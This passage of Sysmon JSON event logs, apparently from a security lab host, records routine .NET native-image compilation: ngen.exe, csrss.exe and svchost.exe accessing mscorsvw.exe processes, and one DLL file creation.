07:01:15.716","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001026A80C00}","TargetProcessId":"3280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7822,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.716\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001026A80C00}\r\nTargetProcessId: 3280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.716","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001026A80C00}","TargetProcessId":"3280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7823,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.716\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001026A80C00}\r\nTargetProcessId: 3280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.716","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001026A80C00}","TargetProcessId":"3280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7824,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:15.731\r\nProcessGuid: {E2A3D6B1-133B-5F25-0000-001026A80C00}\r\nProcessId: 3280\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cd0-0\\Microsoft.VisualC.dll\r\nCreationUtcTime: 2020-08-01 07:01:15.731","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:15.731","ProcessGuid":"{E2A3D6B1-133B-5F25-0000-001026A80C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cd0-0\\Microsoft.VisualC.dll","CreationUtcTime":"2020-08-01 07:01:15.731","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7825,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.778\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001044AB0C00}\r\nTargetProcessId: 4760\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.778","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001044AB0C00}","TargetProcessId":"4760","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7826,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.778\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001044AB0C00}\r\nTargetProcessId: 4760\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.778","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001044AB0C00}","TargetProcessId":"4760","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7827,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001044AB0C00}\r\nTargetProcessId: 4760\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001044AB0C00}","TargetProcessId":"4760","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7828,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.825\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001061AF0C00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.825","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001061AF0C00}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7829,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.825\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001061AF0C00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.825","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001061AF0C00}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7830,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.841\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001061AF0C00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 